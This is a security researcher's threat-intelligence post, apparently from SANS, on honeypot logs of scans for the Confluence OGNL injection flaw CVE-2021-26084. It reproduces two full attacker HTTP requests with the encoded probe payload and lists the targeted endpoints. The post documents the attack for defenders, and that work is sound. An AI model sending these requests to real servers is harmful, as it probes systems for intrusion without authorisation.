Internet Wide Scan Fingerprinting Confluence Servers
Looking over some of our honeypot logs today, I noticed one IP address, 60.223.74.99, scanning for several older Confluence vulnerabilities.
Confluence is the collaboration component of Atlassian's suite of developer tools [1]. Attacks against developers, and the tools they are using, are on the rise in general, and this is yet another "piece to the puzzle." A quick search using NIST's NVD shows 18 vulnerabilities in Confluence [2].
The scans use a known PoC exploit for CVE-2021-26084, an OGNL injection vulnerability[3].
Here are two sample requests sent by the attacker:
POST /users/user-dark-features HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
queryString=aaaa%5Cu0027%2B%7B506%2A5210%7D%2B%5Cu0027bbb
POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: [redacted]:8090
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
queryString=aaaa%5Cu0027%2B%7B3304%2A9626%7D%2B%5Cu0027bbb
All endpoints hit by the attacker:
/confluence/pages/createpage-entervariables.action
/confluence/pages/createpage-entervariables.action?SpaceKey=x
/pages/createpage.action?spaceKey=myproj
/pages/createpage-entervariables.action
/pages/createpage-entervariables.action?SpaceKey=x
/pages/doenterpagevariables.action
/pages/templates2/viewpagetemplate.action
/template/custom/content-editor
/templates/editor-preload-container
/users/user-dark-features
/wiki/pages/createpage-entervariables.action
/wiki/pages/createpage-entervariables.action?SpaceKey=x
The payload string decodes to:
aaaa'{506*5210}'bbb
The likely goal is to have the system return the result of the math problem to see if it is vulnerable to this attack.
No scans were seen from that source IP until today. It appears to be an otherwise unremarkable IP address allocated to what looks like a China Unicom consumer. It may be a CGNAT address used by China Unicom.
[1] https://www.atlassian.com/software/confluence
[2] https://nvd.nist.gov/vuln/search/results?form_type=Basic&results_type=overview&query=cpe%3A2.3%3Aa%3Aatlassian%3Aconfluence_data_center&search_type=all&isCpeNameSearch=false
[3] https://github.com/alt3kx/CVE-2021-26084_PoC
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
Application Security: Securing Web Apps, APIs, and Microservices | Online | US Eastern | Jan 27th - Feb 1st 2025 |
Comments
Perhaps this is a follow up scan to the recent Atlassian breach?
Robert
Feb 23rd 2023
1 year ago
Same UA, same headers, same pages targeted, same query.
Robert
Feb 23rd 2023
1 year ago